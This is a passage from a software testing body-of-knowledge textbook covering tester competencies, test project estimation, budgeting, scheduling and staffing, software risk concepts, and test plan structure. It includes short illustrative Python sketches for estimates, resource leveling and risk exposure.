in testing is minimal. However, if that individual maintains current testing competencies by
continually learning new testing tools and techniques, that individual is prepared for new
assignments, new job opportunities, and promotions.
In Skill Category 1, the software testing style known as “Exploratory Testing” was described.
In that section it stated, “The Exploratory Testing style is quite simple in concept; the tester
learns things that together with experience and creativity generates new good tests to run.”
The ability to be a creative thinker, to “think outside the box,” and formulate new, better ways
to test the application relies not on a “textbook” solution but a cognitive exercise on the part of
the tester to solve a problem. This type of skill, while dependent in many ways on the
collective lifetime experience of the individual, can be taught and improved over time.
Aligned with the discussion of practical skills is the notion of Heuristics, a term popularized in
the software testing context by James Bach and Dr. Cem Kaner. Heuristic refers to
experience-based techniques for problem solving, learning, and discovery.
Soft skills are defined as the personal attributes which enable an individual to interact
effectively and harmoniously with other people. Skill Category 3 will describe in depth the
communication skills needed within the context of managing the test project. Surveys of
software test managers regarding which skills are most important for a software tester
consistently place communication skills at the top.
The ability to communicate, both in writing and verbally, with the various stakeholders in the
SDLC is critical. For example, the ability to describe a defect to the development team or to
effectively discuss requirements issues in a requirements walkthrough is crucial. Every tester
must possess excellent communication skills in order to communicate issues in an effective
and efficient manner.
Soft skills are not confined just to communication skills. Soft skills may be used to describe a
person’s Emotional Quotient (EQ). An EQ is defined as the ability to sense, understand, and
effectively apply the power and acumen of emotions to facilitate high levels of collaboration
and productivity. Software testing does not happen in a vacuum. The software tester will be
engaged with many different individuals and groups and the effectiveness of that engagement
greatly impacts the quality of the application under test.
The term “technical skills” is a rather nebulous term. Do we define technical skills to mean
“programming capability”? Are technical skills required for white-box testing? Does
understanding SQL queries at a detailed level mean a tester has technical skills, or does not
understanding SQL queries at a detailed level cast aspersions on a tester’s technical skills? The
STBOK defines technical skills as those skills relating directly to the process of software
testing. For example, writing a test case would require technical skills. Operating an
automated tool would require technical skills. The presence or absence of a particular
technical skill would be defined by the needs of the test project. If a project required
knowledge of SQL queries, then knowing SQL queries would be a technical skill that needs to
already exist or be acquired.
The majority of the content contained in the Software Testing Body of Knowledge relates to
technical skills. How to write a test plan, how to perform pairwise testing, or how to create a
decision table are skills that are described in the different skill categories.
In section 1.2.3.1 of Skill Category 1, the concept of two software quality gaps was discussed.
The first gap, referred to as the producer gap, describes the gap between what was specified
and what was delivered. The second gap, known as the customer gap, describes the gap
between the customer’s expectations and the product delivered. That section went on to state
that a significant role of the software tester is to help close these two gaps.
The practical and soft skills described in sections 2.5.1.1 and 2.5.1.2 would be used by the
software tester to help close both the producer and customer gap. The technical skills
discussed in section 2.5.1.3 would primarily be used to close the producer gap. The domain
knowledge of the software tester would be used to close the customer gap.
Domain knowledge provides a number of benefits to the software test organization. They
include:
• Testing the delivery of a quality customer experience. Domain knowledge gives the
tester the ability to help “fine tune” the user interface, get the look and feel right, test
the effectiveness of reports, and ensure that operational bottlenecks are resolved.
• An understanding of what is important to the end user. Oftentimes the IT team has
its own perception of what is important in an application, and it tends to be the big
issues. However, in many cases critical attributes of a system from the user’s
standpoint may be as simple as the number of clicks needed to access a client record.
• Section 1.2.5 of Skill Category 1 described the Software Quality Factors and Criteria.
These factors are not business requirements (which typically define what a system
does), but rather the quality factors and criteria describe what a system “is” (what
makes it a good software system). Among these criteria are such attributes as
simplicity, consistency, and operability. These factors would be most effectively
evaluated by a tester who has the knowledge about what makes an application
successful within the operational environment.
Developing the capabilities of individuals within the software testing organization does not
just happen. A dedicated effort, which includes the efforts of both the test organization and the
individual, must be made. Working together, a road map for tester capability development can
be created which includes both development of skills and the capability to effectively utilize
those skills in daily work.
Figure 2-5 is typical of how a software testing organization may measure an individual
tester’s competency. This type of chart would be developed by the Human Resources
department to be used in performance appraisals. Based on the competency assessment in that
performance appraisal, raises and promotions are determined.
Skill Category 3
Managing the Test Project
Software testing is a project with almost all the same attributes as a software
development project. Software testing involves project planning, project staffing,
scheduling and budgeting, communicating, assigning and monitoring work, and
ensuring that changes to the project plan are incorporated into the test plan.
Logically the test plan would be developed prior to the test schedule and budget. However,
testers may be assigned a budget and then build a test plan and schedule that can be
accomplished within the allocated budget. The discussion in this skill category will include
planning, scheduling and budgeting as independent topics, although they are all related.
The six key tasks for test project administration are planning, estimation, budgeting,
scheduling, staffing, and customization of the test process if needed. The plan
defines the steps of testing, estimation provides clarity on the magnitude of the tasks ahead,
the schedule determines the date testing is to be started and completed, the budget determines
the amount of resources that can be used for testing, and test process customization assures the
test process will accomplish the test objectives.
Because testing is part of a system development project, its plan, budget, and schedule cannot
be developed independently of the overall software development plan, budget, and schedule.
The build component and the test component of a software development project need to be
integrated. In addition, these plans, schedules, and budgets may be dependent on available
resources from other organizational units, such as users.
Each of the six items listed should be developed by a process. These are the processes for
test planning, estimating, budgeting, scheduling, resourcing, and test process customization.
The results from those processes should be updated throughout the execution of the software
testing tasks. As conditions change so must the plan, budget, schedule, and test process. These
are interrelated variables and changing one has a direct impact on the other three.
3.1.2 Estimation
As part of the test planning process, the test organization must develop estimates for budget
and scheduling of software testing processes.
At the heart of any estimate is the need to understand the size of the “object” being estimated.
It would be unrealistic to ask a building contractor to estimate the cost of building a house
without providing the information necessary to understand the size of the structure. Likewise,
to estimate how much time it will take to test an application before the application exists can
be daunting. As Yogi Berra, the famous New York Yankees catcher, once said, “It’s tough to
make predictions, especially about the future.” Unfortunately, predictions must be made for
both budget and schedule and a first step in this process is understanding the probable size of
the application.
There is no one correct way to develop an estimate of application size. Some IT organizations
use judgment and experience to create estimates; others use automated tools. The following
discussions represent some of the estimation processes but not necessarily the only ones. The
tester needs to be familiar with the general concept of estimation and then use those processes
as necessary.
Factors that influence estimation include but are not limited to:
• Development life cycle model used
• Requirements
• Past data
• Organization culture
• Selection of suitable estimation technique
• Personal experience
• Resources available
• Tools available
Remember, by definition an estimate means something that can change, and it will. It is a
basis on which decisions can be made. For this reason the test manager must continually
monitor the estimates and revise them as necessary. The importance of monitoring will vary
depending on the SDLC model and the current life cycle phase of the selected model.
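While the STBOK does not prescribe a single estimating technique, the minimal sketch below
illustrates one widely used approach, three-point (PERT) estimating, applied to testing tasks.
The task names and tester-day figures are hypothetical and used only to show the arithmetic.

# Three-point (PERT) estimate: (optimistic + 4 * most_likely + pessimistic) / 6
# Task names and effort figures (in tester-days) are hypothetical.
test_tasks = {
    "Test planning":        (3, 5, 9),
    "Test case design":     (8, 12, 20),
    "Test data generation": (2, 4, 8),
    "Test execution":       (10, 15, 30),
}

def pert(optimistic: float, most_likely: float, pessimistic: float) -> float:
    return (optimistic + 4 * most_likely + pessimistic) / 6

total = 0.0
for task, (o, m, p) in test_tasks.items():
    estimate = pert(o, m, p)
    total += estimate
    print(f"{task:22s} {estimate:5.1f} tester-days")
print(f"{'Total':22s} {total:5.1f} tester-days")

As conditions change, the inputs change and the estimate is simply recomputed, which is why
the estimates must be monitored and revised throughout the project.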
Section 3.1.2 described a number of the methodologies for estimating the size and effort
required for a software development project and by logical extension the efforts required to
test the application. An estimate is, however, an ‘educated guess.’ The methods previously
described almost universally required some level of expert judgment. The ability, based on
experience, to compare historical figures with current project variables to make time and
effort predictions is Expert Judgment.
A budget, by contrast, is not an estimate; it is a plan that utilizes the results of those estimating
processes to allocate test and monetary resources for the test project. The testing budget,
regardless of the effort and precision used to create it, still has, as its foundation, the earlier
estimates. Each component that went into creating the budget requires as much precision as is
realistic; otherwise, it is wasted effort and useless to help manage the test project.
A budget or cost baseline, once established, should not be changed unless approved by the
project stakeholders as it is used to track variances against the planned cost throughout the
application life cycle.
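As a simple illustration of tracking variances against the cost baseline, the sketch below
compares hypothetical planned and actual spend by test phase; the phases and dollar figures
are illustrative only and not drawn from any STBOK example.

# Hypothetical cost baseline and actuals (in dollars) per test phase.
baseline = {"Planning": 10_000, "Design": 25_000, "Execution": 60_000}
actuals  = {"Planning": 11_500, "Design": 24_000, "Execution": 0}  # execution not started yet

for phase, planned in baseline.items():
    spent = actuals.get(phase, 0)
    variance = planned - spent            # positive = under the baseline so far
    pct = (spent / planned) * 100 if planned else 0
    print(f"{phase:10s} planned {planned:>8,}  spent {spent:>8,}  "
          f"variance {variance:>8,}  ({pct:5.1f}% consumed)")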
3.1.4 Scheduling
A schedule is a calendar-based breakdown of tasks and deliverables. It helps the project
manager and project leader manage the project within the time frame and keep track of
current, as well as future, problems. A Work Breakdown Structure helps to define the activities
at a broader level, such as who will do the activities, but planning is not complete until a
resource and a time are attached to each activity. In simple terms, scheduling answers these
questions:
• What tasks will be done?
• Who will do them?
• When will they do them?
The process of adjusting a schedule based on staff constraints is called resource leveling.
Resource leveling involves accounting for the availability of staff when scheduling tasks.
Resource leveling will help in efficient use of the staff. Resource leveling is also used for
optimization. While resource leveling optimizes available staff, it does not ensure that all the
staff needed to accomplish the project objectives will be available at the time they are
required.
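A minimal sketch of the resource leveling idea is shown below; it assigns hypothetical test
tasks to whichever tester becomes available first, so that no more tasks run concurrently than
there are testers. The task list, durations, and tester names are illustrative assumptions.

import heapq

# Hypothetical test tasks (name, duration in days) and a fixed pool of testers.
tasks = [("Write test cases", 5), ("Build test data", 3), ("Execute cycle 1", 8),
         ("Execute cycle 2", 8), ("Regression run", 4)]
testers = ["Tester A", "Tester B"]

# Each heap entry is (day the tester becomes free, tester name).
availability = [(0, name) for name in testers]
heapq.heapify(availability)

schedule = []
for task, duration in tasks:
    free_day, tester = heapq.heappop(availability)      # earliest-available tester
    schedule.append((task, tester, free_day, free_day + duration))
    heapq.heappush(availability, (free_day + duration, tester))

for task, tester, start, end in schedule:
    print(f"{task:18s} {tester}: day {start} to day {end}")

A real leveling exercise also honors task dependencies and calendars; this sketch only shows
how leveling trades schedule dates against the staff actually available.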
Once a schedule is made, it is possible that during certain phases some staff will be idle
whereas at a peak time, those same staff members will be paid overtime to complete the task.
This could happen as a result of delays by the development team deploying planned
application builds into the test environment. It is best to plan for such occurrences as they will
invariably happen.
Status reports are a major input to the schedule. Scheduling revolves around monitoring the
work progress versus work scheduled. A few advantages of scheduling are:
• Once a schedule is made, it gives a clear idea to the team and the management of the
roles and responsibility for each task
• It enables tracking
• It allows the project manager the opportunity to take corrective action
3.1.5 Resourcing
Ideally, staffing would be done by identifying the needed skills and then acquiring members
of the test project who possess those skills. It is not necessary for every member of the test
team to possess all the skills, but in total the team should have all the needed skills. In some IT
organizations, management assigns the testers and no determination is made as to whether the
team possesses all the needed skills. In that case, it is important for the test manager to
document the needed skills and the skills available from the team members. Gaps in needed
skills may be filled by individuals assigned to the test project on a short-term
basis or by training the assigned resources.
The recommended test project staffing matrix is illustrated in Table 3-1. This matrix shows
that the test project has identified the needed skills. In this case they need planning skills, test
data generation skills, and skills in using tools X and Y. The matrix shows there are four
potential candidates for assignment to that project. Assuming that only two testers are needed,
the test manager would then attempt to get the two who, in total, have all four needed
skills.
If the test team does not possess the necessary skills, it is the responsibility of the test manager
to teach those individuals the needed skills. This training can be on-the-job training, formal
classroom training, or e-learning training.
Skills Needed
Staff    Planning    Test Data Generation    Tool X    Tool Y
A X X
B X X X
C X X
D X X X
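The pairing logic described above can be expressed as a simple coverage check. The sketch
below uses hypothetical skill assignments (the authoritative assignments are those shown in
Table 3-1) to find every pair of candidates whose combined skills cover all four needed skills.

from itertools import combinations

needed_skills = {"Planning", "Test Data Generation", "Tool X", "Tool Y"}

# Hypothetical skills per candidate tester, for illustration only.
candidates = {
    "A": {"Planning", "Tool X"},
    "B": {"Planning", "Test Data Generation", "Tool Y"},
    "C": {"Test Data Generation", "Tool X"},
    "D": {"Planning", "Tool X", "Tool Y"},
}

# Find every pair of testers whose combined skills cover everything the project needs.
covering_pairs = [
    pair for pair in combinations(candidates, 2)
    if needed_skills <= candidates[pair[0]] | candidates[pair[1]]
]
print(covering_pairs)   # pairs whose combined skills suffice, e.g., ('A', 'B')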
There are literally thousands of books written on how to supervise work. There is no one best
way to supervise a subordinate. However, most of the recommended approaches to
supervision include the following:
• Communication skills
The ability of the supervisor to effectively communicate the needed direction and
information, and to resolve potential impediments to completing the testing tasks
effectively and efficiently.
• Negotiation and complaint resolution skills
Some specific skills needed to make a supervisor effective, like resolving complaints,
using good judgment, and knowing how to provide constructive criticism.
• Project relationships
Developing effective working relationships with the test project stakeholders.
• Motivation, Mentoring, and Recognition
Encouraging individuals to do their best, supporting individuals in the performance of
their work tasks, and rewarding individuals for effectively completing those tasks.
Skill Category 4
Risk in the Software Development Life Cycle
It is often stated that a primary goal of a software tester is to reduce the risk associated
with the deployment of a software application system. The very process of test
planning is based on an understanding of the types and magnitudes of risk throughout
the software application life cycle. The objective of this skill category is to explain the
concept of risk which includes project, process, and product risk. The tester must understand
these risks in order to evaluate whether the controls are in place and working in the
development processes and within the application under test. Also, by determining the
magnitude of a risk the appropriate level of resources can be economically allocated to reduce
that risk.
This first category, software project risk, includes operational, organizational, and contractual
software development parameters. Project risk is primarily a management responsibility and
includes resource constraints, external interfaces, supplier relationships, and contract
restrictions. Other examples are unresponsive vendors and lack of organizational support.
Perceived lack of control over project external dependencies makes project risk difficult to
manage. Funding is the most significant project risk reported in risk assessments.
This second category, software process risk, includes both management and technical work
procedures. In management procedures, you may find process risk in activities such as
planning, resourcing, tracking, quality assurance, and configuration management. In technical
procedures, you may find it in engineering activities such as requirements analysis, design,
code, and test. Planning is the management process risk most often reported in risk
assessments. The technical process risk most often reported is the development process.
This third category, software product risk, contains intermediate and final work product
characteristics. Product risk is primarily a technical responsibility. Product risks can be found
in the requirements phase, analysis and design phase, code complexity, and test specifications.
Because software requirements are often perceived as flexible, product risk is difficult to
manage. Requirements are the most significant product risks reported in product risk
assessments.
Risk is the potential loss to an organization, for example, the risk resulting from the misuse of
computer resources. This may involve unauthorized disclosure, unauthorized modification,
and/or loss of information resources, as well as the authorized but incorrect use of computer
systems. Risk can be measured by performing risk analysis.
Risk Event is a future occurrence that may affect the project for better or worse. The positive
aspect is that these events will help you identify opportunities for improvement while the
negative aspect will be the realization of threats and losses.
Risk Exposure is the measure determined by multiplying the probability (likelihood) of the
event by the loss that could occur.
Risk Management is the process required to identify, quantify, respond to, and control
project, process, and product risk.
Risk Appetite defines the amount of loss management is willing to accept for a given risk.
Active Risk is risk that is deliberately taken on. For example, the choice to develop a new
product that may not be successful in the marketplace.
Passive Risk is that which is inherent in inaction. For example, the choice not to update an
existing product to compete with others in the marketplace.
Risk Acceptance is the amount of risk exposure that is acceptable to the project and the
company and can be either active or passive.
Risk Identification is a method used to find risks before they become problems. The risk
identification process transforms issues and concerns about a project into tangible risks, which
can be described and measured.
Inherent Risk is the risk to an organization in the absence of any actions management might
take to alter either the risk’s likelihood or impact.
Residual Risk is the risk that remains after management responds to the identified risks.
Control is anything that tends to cause the reduction of risk. Control can accomplish this by
reducing harmful effects or by reducing the frequency of occurrence.
A risk is turned into a loss by a threat. A threat is the trigger that causes the risk to become a
loss. For example, if fire is a risk, then a can of gasoline in the house or young children
playing with matches are threats that can cause the fire to occur. While it is difficult to deal
with risks, one can deal very specifically with threats.
Threats are reduced or eliminated by controls. Thus, control can be identified as anything that
tends to cause the reduction of risk. In our fire situation, if we removed the can of gasoline
from the home or stopped the young children from playing with matches, we would have
eliminated the threat and thus reduced the probability that the risk of fire would be realized.
The process of evaluating risks, threats, controls, and vulnerabilities is frequently called risk
analysis. This is a task that the tester performs when he/she approaches the test planning from
a risk perspective.
Risks, which are always present in an application environment, are triggered by a variety of
threats. Some of these threats are physical, such as fire, water damage, earthquake, and
hurricane. Other threats are people-oriented, such as errors, omissions, intentional acts to
disrupt system integrity, and fraud. These risks cannot be eliminated, but controls can reduce
the probability of the risk turning into a damaging event. A damaging event is the
materialization of a risk to an organization’s assets.
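To tie the vocabulary above together, the sketch below computes risk exposure (the likelihood
of an event multiplied by the loss it would cause) for a few hypothetical application risks and
ranks them so that test resources can be directed at the largest exposures first. The risk names,
probabilities, and loss figures are illustrative only.

# Hypothetical risks: (name, probability of a damaging event, loss in dollars if it occurs)
risks = [
    ("Payroll calculation error",   0.10, 500_000),
    ("Report formatting defect",    0.40,   5_000),
    ("Customer data disclosure",    0.02, 2_000_000),
    ("Batch interface failure",     0.15, 100_000),
]

# Risk exposure = probability (likelihood) of the event x the loss that could occur.
ranked = sorted(risks, key=lambda r: r[1] * r[2], reverse=True)
for name, probability, loss in ranked:
    print(f"{name:28s} exposure = {probability * loss:>12,.0f}")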
Skill Category 5
Test Planning
Testers need specific skills to plan tests and to select appropriate techniques and
methods to validate a software application against its approved requirements and
design. In Skill Category 3, “Managing the Test Project,” test planning was shown to
be part of the test administration processes. In Skill Category 4, “Risk in the SDLC,”
the assessment and control of risk was discussed in detail. Specific to testing, risk assessment
and control is an integral part of the overall planning process. Having assessed the risks
associated with the software application under test, a plan to minimize those risks can be
created. Testers must understand the development methods and operating environment to
effectively plan for testing.
The test plan serves two specific purposes: a contract and a roadmap.
Second, the test plan acts as a roadmap for the test team. The plan describes the approach the
team will take, what will be tested, how testing will be performed, by whom, and when to stop
testing. The roadmap reflects the tactical activities to be accomplished and how they will be
accomplished. By clearly identifying the activities, the plan creates accountability on the part
of the test team to execute the plan and to ensure that objectives are met.
Acceptance criteria will likely evolve from high-level conceptual acceptance criteria to more
detailed product-level criteria. The details might manifest themselves in the form of Use Cases
or, in an Agile project, clear, concise User Stories. Regardless, it is critical that before planning
begins we understand where we are going.
5.2.3 Assumptions
In developing any type of plan, certain assumptions exist. For example, if a mobile application
under test required a newly developed smartphone platform, an assumption could be that the
hardware would be available on a specific date. The test plan would then be constructed based
on that assumption. It is important that assumptions be documented for two reasons: first, to
assure that they are effectively incorporated into the test plan, and second, so that they can be
monitored should the event included in the assumption not occur. For example, hardware that
was supposed to be available on a certain date will not be available until three months later.
This could significantly change the sequence and type of testing that occurs.
Some organizations divide individuals into four categories when attempting to identify issues.
These categories are:
• Those who will make the software system happen
• Those who will hope the software system happens
• Those who will let the software system happen
• Those who will attempt to make the software system not happen
If the stakeholders are divided among these four categories, issues are frequently apparent.
For example, if two different business units want to make the software system happen, a
decision would have to be made as to which would have primary responsibility and which
would have secondary responsibility. If both want to have primary responsibility, conflict will
occur.
5.2.5 Constraints
As described earlier, the test plan is both a contract and a roadmap. For both the contract to be
met and the roadmap to be useful, it is important that the test plan be realistic. Constraints are
those items that will likely force a dose of “reality” on the plan. The obvious constraints are
test staff size, test schedule, and budget. Other constraints can include the inability to access
user databases for test purposes, limited access to hardware facilities for test purposes, and
minimal user involvement in development of the test plan and testing activities.
Because constraints restrict the ability of testers to test effectively and efficiently, the
constraints must be documented and integrated into the test plan. It is also important that the
end users of the software understand the constraints placed on testers and how those
constraints may impact the role and responsibility of software testers in testing the application
system.
1. Define what it means to meet the project objectives. These are the objectives to be
accomplished by the project team.
2. Understand the core business areas and processes. All information systems are not
created equal. Systems that support mission-critical business processes are clearly more
important than systems for mission-support functions (usually administrative),
although these, too, are necessary. Focusing on core business areas and processes is
essential to the task of assessing the impact of the problem and for establishing the
priorities for the program.
3. Assess the severity of potential failures. This must be done for each core business area
and its associated processes.
4. Identify the components of the system:
Links to core business areas or processes
Platform languages and database management systems
Operating system software and utilities
Telecommunications
Internal and external interfaces
Owners
Availability and adequacy of technical documentation
5. Assure requirements are testable. Effective testing cannot occur if requirements cannot
be tested to determine if they are implemented correctly.
6. Address implementation schedule issues.
Implementation checkpoints
Schedule of implementation meetings
7. Identify interface and data exchange issues including the development of a model
showing the internal and external dependency links amongst core business areas,
processes, and information systems.
8. Evaluate contingency plans for the application. These should be realistic contingency
plans, including the development and activation of manual or contract procedures, to
ensure the continuity of core business processes.
On the left side of the “V” are primarily the verification or static tests, and on the right side of
the “V” are the validation or dynamic tests. These levels of testing include:
• Verification or static tests
Requirements reviews
Design reviews
Code walkthroughs
Code inspections
• Validation or dynamic tests
Unit testing
Integration testing
System testing
User acceptance testing
These testing levels are part of the Software Quality Assurance V&V processes. Many
organizations have discrete plans as depicted in Figure 5-2, while others may incorporate all
testing activities, both static and dynamic, into one test plan. The complexity of this hierarchy
may be driven by the development model, the size and complexity of the application under
test, or the results of the risk assessment and control processes described in Skill Category 4.
The example test plans described in the following sections will incorporate several of the
plans shown in Figure 5-2 and represent common test plan structures.
“The act of designing tests is one of the most effective error prevention
mechanisms known…
The thought process that must take place to create useful tests can discover and
eliminate problems at every stage of development.”
Boris Beizer
There is no one right way to plan tests. The test planning process and the subsequent test
plan must reflect the type of project, the type of development model, and other related
influencers. However, there are recognized international standards for the format of test
plans which can serve as a good starting point in the development of a test plan standard for
an organization. As noted in Skill Category 1, section 1.4, ISO/IEC/IEEE 29119-3 (replaces
IEEE 829) defines templates for test documentation covering the entire software testing life
cycle. Within the section on Test Management Process Documentation is the Test Plan
standard. The material found in this section will reflect some of the IEEE standards along
with other good practices. This section will also include “how-to” information in order to
help understand the components of the software test plan.
The test plan describes how testing will be accomplished. Its creation is essential to effective
testing. If the plan is developed carefully, test execution, analysis, and reporting will flow
smoothly. The time spent in developing the plan is well worth the effort.
The test plan should be an evolving document. As the development effort changes in scope,
the test plan must change accordingly. It is important to keep the test plan current and to
follow it. It is the execution of the test plan that management must rely on to ensure that
testing is effective. Also, from this plan the testers ascertain the status of the test effort and
base opinions on the results of the test effort.
Test planning should begin as early in the development process as possible. For example, in a
waterfall development project, planning would begin at the same time requirements definition
starts. It would be detailed in parallel with application requirements. During the analysis
stage of the project, the test plan defines and communicates test requirements and the amount
of testing needed so that accurate test estimates can be made and incorporated into the project
plan. Regardless of the development methodology, planning must take place early in the life
cycle and be maintained throughout.
The test plan should define the process necessary to ensure that the tests are repeatable,
controllable, and ensure adequate test coverage when executed.
Repeatable - Once the necessary tests are documented, any test team member should be able
to execute the tests. If the test must be executed multiple times, the plan ensures that all of the
critical elements are tested correctly. Parts or the entire plan can be executed for any necessary
regression testing.
Controllable - Knowing what test data is required, when testing should be run, and what the
expected results are all documented to control the testing process.
Coverage - Based on the risks and priorities associated with the elements of the application
system, the test plan is designed to ensure that adequate test coverage is built into the test. The
plan can be reviewed by the appropriate parties to ensure that all are in agreement regarding
the direction of the test effort.
The development of an effective test plan involves the following tasks that are described
below.
• Set test objectives
Test objectives need to be defined and agreed upon by the test team. These objectives must be
measurable and the means for measuring defined. In addition, the objectives must be
prioritized.
Test objectives should restate the project objectives from the project plan. In fact, the test plan
objectives should determine whether those project plan objectives have been achieved. If the
project plan does not have clearly stated objectives, then the testers must develop their own
by:
• Setting objectives to minimize the project risks
• Brainstorming to identify project objectives
• Relating objectives to the testing policy, if established
The testers must have the objectives confirmed as the project objectives by the project team.
When defining test objectives, ten or fewer test objectives are a general guideline; too many
distract the tester’s focus. To define test objectives testers need to:
• Write the test objectives in a measurable statement, to focus testers on accomplishing
the objective.
• Assign a priority to the objectives, such as:
High – The most important objectives to be accomplished during testing.
Average – Objectives to be accomplished only after the high-priority test
objectives have been accomplished.
Low – The least important test objectives.
Note: Establish priorities so that approximately one-third are high, one-third are average,
and one-third are low.
• Define the acceptance criteria for each objective. This should state, quantitatively, how
the testers would determine whether the objective has been accomplished. The more
specific the criteria, the easier it will be for the testers to determine whether it has been
accomplished.
At the conclusion of testing, the results of testing can be consolidated upward to determine
whether or not the test objective has been accomplished.
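The guidance above can be captured in a simple structure. The sketch below represents
hypothetical, measurable, prioritized test objectives and orders them so that, if test time is cut
short, the highest-priority objectives are worked first; the objectives and criteria shown are
illustrative only.

from dataclasses import dataclass

@dataclass
class TestObjective:
    statement: str            # measurable statement of what testing must demonstrate
    priority: str             # "High", "Average", or "Low"
    acceptance_criteria: str  # quantitative definition of "accomplished"

# Hypothetical objectives for a payroll-style application.
objectives = [
    TestObjective("Validate payroll calculations", "High",
                  "100% of payroll test cases pass with zero severity-1 defects"),
    TestObjective("Verify report layouts", "Low",
                  "95% of report test cases pass"),
    TestObjective("Confirm general ledger posting", "Average",
                  "All posting test cases pass with variances under $0.01"),
]

# If test time is cut short, work the highest-priority objectives first.
rank = {"High": 0, "Average": 1, "Low": 2}
for obj in sorted(objectives, key=lambda o: rank[o.priority]):
    print(f"[{obj.priority:7}] {obj.statement} -- done when: {obj.acceptance_criteria}")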
Two of the essential items in the test plan are the functions to be tested (scope) and how
testing will be performed. Both will be clearly articulated in the formal plan. Creating the test
matrix is the key process in establishing these items. The test matrix lists which software
functions must be tested and the types of tests that will test those functions. The matrix shows
“how” the software will be tested using checkmarks to indicate which tests are applicable to
which functions. The test matrix is also a test “proof.” It proves that each testable function has
at least one test, and that each test is designed to test a specific function.
An example of a test matrix is illustrated in Table 5-1. It shows four functions in a payroll
system, with four tests to validate them. Since payroll is a batch system where data is entered
all at one time, test data is also batched using various dates. The parallel test is run when
posting to the general ledger, and all changes are verified through a code inspection.
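The test matrix “proof” can be checked mechanically. The sketch below uses illustrative
function and test names loosely patterned on the payroll example to confirm that every
testable function has at least one test and that every planned test is tied to at least one
function; the data is hypothetical, not a reproduction of Table 5-1.

# Test matrix: which tests exercise which payroll functions (illustrative data).
matrix = {
    "Enter time sheets":      {"Batch date test", "Error handling test"},
    "Calculate gross pay":    {"Batch date test", "Code inspection"},
    "Post to general ledger": {"Parallel test", "Code inspection"},
    "Print pay checks":       {"Batch date test"},
}
planned_tests = {"Batch date test", "Parallel test", "Code inspection", "Error handling test"}

# The matrix as a test "proof": every function has at least one test...
untested_functions = [f for f, tests in matrix.items() if not tests]
# ...and every planned test is tied to at least one function.
used_tests = set().union(*matrix.values())
orphan_tests = planned_tests - used_tests

print("Untested functions:", untested_functions or "none")
print("Tests not tied to a function:", orphan_tests or "none")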
The general information is designed to provide background and reference data on testing. In
many organizations this background information will be necessary to acquaint testers with the
project. Incorporated into the general information are the administrative components of the
test plan which identify the schedule, milestones, and resources needed to execute the test
plan. The test administration is sometimes referred to as the “business plan” part of the test
plan in that it does not describe what or how to test but rather details the infrastructure of the
test project. Included in the general information and test administration are:
• Definitions (vocabulary of terms used in the test plan document)
• References
Document Map
Project Plan
Requirements specifications
High Level design document
Detail design document
Additional Reference Documents
Development and Test process standards
Methodology guidelines and examples
Testing is complete when the test team has fully executed the test plan.
Test planning can be one of the most challenging aspects of testing. The following guidelines
can help make the job a little easier.
• Start early
Even though all of the details may not yet be available, a great deal of the planning
effort can be completed by starting on the general and working toward the specific.
Starting early affords the opportunity to identify resource needs and plan for them
before other areas of the project subsume them.
• Keep the Test Plan flexible
Test projects are very dynamic. The test plan itself should be changeable but subject to
change control. Change tolerance is a key success factor in the development models
commonly used.
• Review the Test Plan frequently
Other people’s observations and input greatly facilitate achieving a comprehensive test
plan. The test plan should be subject to quality control just like any other project
deliverable.
• Keep the Test Plan concise and readable
The test plan does not need to be large and complicated. In fact, the more concise and
readable it is, the more useful it will be. Remember, the test plan is intended to be a
communication document. The details should be kept in a separate reference
document.
• Spend the time to do a complete Test Plan
The better the test plan, the easier it will be to execute the tests.
There is no one universally accepted standard for test planning. However, there is great
consistency between the different organizations that have defined a test plan standard. This
section will begin with a discussion of what is normally contained in a test plan and then
provide an example of a test plan standard that is consistent with the test plan standards
provided by major standard-setting bodies such as the International Standards Organization
(ISO), Institute of Electrical and Electronics Engineers (IEEE), International Electrotechnical
Commission (IEC), and National Institute of Standards and Technology (NIST).
Test Plans and their formats vary from company to company, but the best examples contain
most of the elements discussed here. Several test plan outlines will be provided to demonstrate
the various components of different plans.
• Test Environment
• Communication Approach
• Test Tools
A test objective is simply a testing “goal.” It is a statement of what the tester is expected to
accomplish or validate during a specific testing activity. Test objectives:
• Guide the development of test cases, procedures, and test data.
• Enable the tester and project managers to gauge testing progress and success.
• Enhance communication both within and outside of the project team by helping to
define the scope of the testing effort.
Each objective should include a high-level description of the expected test results in
measurable terms and should be prioritized. In cases where test time is cut short, test cases
supporting the highest priority objectives would be executed first.
5.4.2.2.1.3 Assumptions
These assumptions document test prerequisites, which if not met, could have a negative
impact on the test. The test plan should document the risk that is introduced if these
expectations are not met. Examples of assumptions include:
• Skill level of test resources
• Test budget
• State of the application at the start of testing
• Tools available
• Availability of test equipment
Although the test manager should work with the project team to identify risks to the project,
this section of the plan documents test risks and their possible impact on the test effort. Some
teams may incorporate these risks into project risk documentation if available. Risks that
could impact testing include:
• Availability of downstream application test resources to perform system integration or
regression testing
This section of the test plan defines who is responsible for each stage or type of testing. A
responsibility matrix is an effective means of documenting these assignments.
The test plan should be viewed as a sub-plan of the overall project plan. It should not be
maintained separately. Likewise, the test schedule and planned resources should also be
incorporated into the overall Project Plan. Test resource planning includes:
• People, tools, and facilities
• An analysis of skill sets so that training requirements can be identified
This section of the plan defines the data required for testing, as well as the infrastructure
requirements to manage test data. It includes:
• Methods for preparing test data
• Backup and rollback procedures
• High-level data requirements, data sources, and methods for preparation (production
extract or test data generation)
• Whether data conditioning or conversion will be required
• Data security issues
Environment requirements for each stage and type of testing should be outlined in this section
of the plan, for example:
In the complex environment required for software testing in most organizations, various
communication mechanisms are required. These mechanisms should include:
• Formal and informal meetings
• Working sessions
• Processes, such as defect tracking
• Tools, such as issue and defect tracking, electronic bulletin boards, notes databases,
and Intranet sites
• Techniques, such as escalation procedures or the use of white boards for posting the
current state of testing (e.g., test environment down)
• Miscellaneous items such as project contact lists and frequency of defect reporting
5.4.2.2.1.11 Tools
Any tools that will be needed to support the testing process should be included here. Tools are
usually used for:
• Workplan development
• Test planning and management
• Configuration management
• Test script development
• Test data conditioning
• Test execution
• Automated test tools
• Stress/load testing
• Results verification
• Defect tracking
The information outlined here cannot usually all be completed at once but is captured in
greater levels of detail as the project progresses through the life cycle.
The test plan components shown below follow the IEEE 829 standard closely. While the order
may be different, the areas covered by the plans are quite similar. Only the outline list is
provided here; for specific descriptions, visit the ISO 29119 site at:
www.softwaretestingstandard.org.
1. References
2. Introduction
3. Test Items
4. Software Risk Issues
5. Features to be Tested
6. Features not to be Tested
7. Approach
8. Item Pass/Fail Criteria
9. Suspension Criteria and Resumption Requirements
10. Test Deliverables
11. Remaining Test Tasks
12. Environmental Needs
